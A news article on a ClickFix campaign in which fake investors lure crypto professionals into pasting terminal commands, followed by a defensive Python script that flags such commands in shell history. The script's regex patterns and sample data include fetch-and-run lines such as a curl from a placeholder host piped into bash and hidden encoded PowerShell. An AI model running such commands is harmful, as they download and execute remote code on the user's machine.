ClickFixers now pretend to be investors and target crypto professionals

Cybersecurity researchers have found a new ClickFix campaign that, this time, targets crypto professionals and seeks to steal their crypto assets under the cover of fake job offers.
Moonlock Lab noted that this campaign stands out because, in addition to the ClickFix technique itself, in which the victim is tricked into running malicious commands disguised as a routine browser verification step, it also employs advanced social engineering and cross-platform payload delivery.
In short, the threat actor, posing as a venture capitalist, contacts a potential victim on LinkedIn and persuades them to open a fake Zoom meeting link. That link redirects to a spoofed website that presents a counterfeit "I'm not a robot" verification.
Clicking this checkbox writes a malicious command to the user's clipboard. The potential victim is then instructed to open their terminal and paste the clipboard contents, and the usual ClickFix manipulation continues, keeping users convinced that they are simply completing a verification process while the pasted command runs on their machine.
"The attackers have invested in realistic OS-specific UI elements, cursor animations, and psychological pressure mechanics. The user genuinely believes they are completing a security verification to access a conference page, when they are, in fact, executing a remote payload loader on their own machine," Moonlock Lab said.
The researchers claim that the malicious domains share a single registrant, Boston-based Anatolli Bigdasch, who is supposedly the founder of the venture capital firm SolidBit Capital. Meanwhile, a persona named Mykhailo Hureiev, listed as "Co-Founder & Managing Partner" at SolidBit Capital, was mentioned earlier this year in a recruiter scam warning.
According to @0xbigdan, Hureiev contacted them, and the conversation eventually led to two malicious links being shared. The poster listed red flags in this interaction, such as lookalike domains (typosquatting) and pressure to join external links quickly.
"When I invited him to my Google Meet, he joined, stayed silent, then disconnected. Account blocked after," they added.
Meanwhile, according to the cybersecurity researchers, this campaign is well-structured and built to rotate identities when one front is exposed, and the company identities it uses also change constantly. The researchers now tie two further companies, MegaBit and Lumax Capital, to the same threat campaign.
To stay safe from ClickFix attacks, the researchers recommend verifying the company that contacted you, being cautious if a conversation quickly moves off LinkedIn, treating urgency as a red flag, and never pasting commands into your terminal.
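The "paste this into your terminal" step described above leaves a trace in the victim's shell history, which is one of the few places a defender can catch a ClickFix compromise after the fact. The following is an added example, not code from Moonlock Lab or from this article, that scans shell-history lines for the generic one-liner shapes ClickFix pages rely on (remote script piped into a shell, base64 blob decoded and executed, inline AppleScript, hidden or encoded PowerShell, mshta fetching a remote HTA). The indicator patterns are general ClickFix tradecraft rather than commands observed in this campaign, and the sample history lines are constructed for the example; the domain `example.invalid` is a placeholder.

```python
"""Flag shell-history lines that look like pasted ClickFix one-liners.

Added example. The indicators below are generic ClickFix tradecraft, not
commands attributed to the campaign in the article; SAMPLE_HISTORY is
constructed test data.
"""
import re
from typing import Dict, Iterable, List, Tuple

# (indicator name, compiled regex). Case-insensitive because copied commands
# often mix case to slip past naive string filters.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    # Fetch a remote script and pipe it straight into a shell interpreter.
    ("remote_fetch_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;&\n]*\|\s*(sudo\s+)?(ba|z|k)?sh\b", re.I)),
    # Decode an embedded blob and execute it, hiding the real command from the victim.
    ("base64_decode_then_exec",
     re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(ba|z|k)?sh\b"
                r"|\$\(\s*echo\s+\S+\s*\|\s*base64\s+(-d|-D|--decode)", re.I)),
    # macOS: inline AppleScript used for fake dialogs or hidden execution.
    ("osascript_inline",
     re.compile(r"\bosascript\s+-e\b", re.I)),
    # Windows: hidden window or encoded command block handed to PowerShell.
    ("hidden_or_encoded_powershell",
     re.compile(r"\bpowershell(\.exe)?\b.*(-w(indowstyle)?\s+hidden"
                r"|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})", re.I)),
    # Windows: mshta pulling an HTA payload from a remote URL.
    ("mshta_remote",
     re.compile(r"\bmshta(\.exe)?\s+https?://", re.I)),
]

# zsh EXTENDED_HISTORY prefixes each entry with ": <epoch>:<elapsed>;".
ZSH_PREFIX = re.compile(r"^:\s*\d+:\d+;")


def normalize(raw: str) -> str:
    """Strip surrounding whitespace and any zsh extended-history prefix."""
    return ZSH_PREFIX.sub("", raw.strip())


def classify_command(cmd: str) -> List[str]:
    """Return the names of every indicator that matches one command line."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def scan_history(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Map each suspicious (normalized) history line to its matched indicators.

    Blank lines, comments and lines matching no indicator are dropped.
    """
    hits: Dict[str, List[str]] = {}
    for raw in lines:
        cmd = normalize(raw)
        if not cmd or cmd.startswith("#"):
            continue
        names = classify_command(cmd)
        if names:
            hits[cmd] = names
    return hits


# Constructed sample history (not real victim data). The final line is a
# legitimate base64 decode with no execution and must not be flagged.
SAMPLE_HISTORY = [
    "git status",
    "ls -la ~/Downloads",
    ": 1700000000:0;curl -fsSL https://example.invalid/verify.sh | bash",
    "echo aGVsbG8gd29ybGQK | base64 -d | sh",  # blob is just 'hello world'
    "osascript -e 'display dialog \"Verification complete\"'",
    "powershell -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA",  # placeholder blob
    "base64 -d notes.b64 > notes.txt",
]

if __name__ == "__main__":
    for cmd, names in scan_history(SAMPLE_HISTORY).items():
        print(f"{', '.join(names):32} {cmd}")
```

Run it against `~/.zsh_history` or `~/.bash_history` (one line per entry) instead of `SAMPLE_HISTORY` to triage a host. The regexes are deliberately narrow, so a legitimate `base64 -d` into a file or a plain `curl` download does not fire; the pipe into a shell, the hidden window, or the remote HTA is what makes a line suspicious.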
Unlock more exclusive Cybernews content on YouTube.